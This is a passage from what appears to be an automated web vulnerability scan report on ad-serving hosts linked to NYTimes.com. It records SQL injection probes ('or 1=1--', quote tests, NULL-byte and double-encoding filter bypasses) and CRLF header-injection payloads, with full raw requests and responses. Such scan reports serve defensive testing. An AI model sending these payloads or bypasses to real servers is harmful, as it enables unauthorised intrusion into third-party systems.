document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
|
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00''&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
|
1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Tentative |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5739.NYTimes.com/B4990972.8 |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 71268400%20or%201%3d1--%20 and 71268400%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d1--%20=1 HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');
function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Flash40.swf"; var gif = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Static.jpg"; var minV = 8; var FWH = ' width="728" height="90" '; var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) { var ctParam = ctp[ctIndex]; var ctVal = ctv[ctIndex]; if(ctVal != null && typeof(ctVal) == 'string') { if(ctVal == "") { ctVal = defaultCtVal; } else { ctVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B ...[SNIP]...
|
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d2--%20=1 HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130399999999999003BAN007"><img src="http://s0.2mdn.net/viewad/2215498/BAN_TorchBrowser_728x90_FY11_Q3_Static.jpg" border=0 alt="Click here to find out more!"></a>');
|
1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Tentative |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5739.NYTimes.com/B4990972.8 |
Issue detail
The opzn&page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the opzn&page parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel'&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
|
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel''&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
|
1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Tentative |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5739.NYTimes.com/B4990972.8 |
Issue detail
The pos parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pos parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00'&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
|
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00''&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
|
1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Tentative |
Host: |
http://amch.questionmarket.com |
Path: |
/adscgen/sta.php |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adscgen/sta.php%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;
|
Response 1
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:49:02 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1410
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... </a> about the error.
</dd> ...[SNIP]...
|
Request 2
GET /adscgen/sta.php%2527%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;
|
Response 2
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:49:26 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Length: 308 Keep-Alive: timeout=120, max=267 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adscgen/sta.php%27%27 was not found on this server.< ...[SNIP]...
|
2. HTTP header injection
previous
next
There are 82 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://50.xg4ken.com |
Path: |
/media/redir.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3ad15%0d%0a1c8f5fba2b9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&3ad15%0d%0a1c8f5fba2b9=1 HTTP/1.1 Host: 50.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63
|
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 01:48:15 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=2fb24f52-9cc4-a448-bb6f-0000476b34c3; expires=Fri, 11-Feb-2011 01:48:15 GMT; path=/; domain=.xg4ken.com Location: http://www.perpetual.com.au/investors.aspx?3ad15 1c8f5fba2b9=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
|
2.2. http://50.xg4ken.com/media/redir.php [url[] parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://50.xg4ken.com |
Path: |
/media/redir.php |
Issue detail
The value of the url[] request parameter is copied into the Location response header. The payload add4a%0d%0ac9c4539c3b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspxadd4a%0d%0ac9c4539c3b6 HTTP/1.1 Host: 50.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63
|
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 01:48:12 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=69a583c2-bc54-63e9-bbde-000069f3421b; expires=Fri, 11-Feb-2011 01:48:12 GMT; path=/; domain=.xg4ken.com Location: http://www.perpetual.com.au/investors.aspxadd4a c9c4539c3b6 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
|
2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/BannerRedirect.asp |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fbfaf%0d%0a92218480552 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0fbfaf%0d%0a92218480552; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0fbfaf 92218480552; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Connection: close
|
2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/BannerSource.asp |
Issue detail
The value of the Pos request parameter is copied into the Set-Cookie response header. The payload ff8ba%0d%0a362c533d84b was submitted in the Pos parameter. This caused a response containing an injected HTTP header.
Request
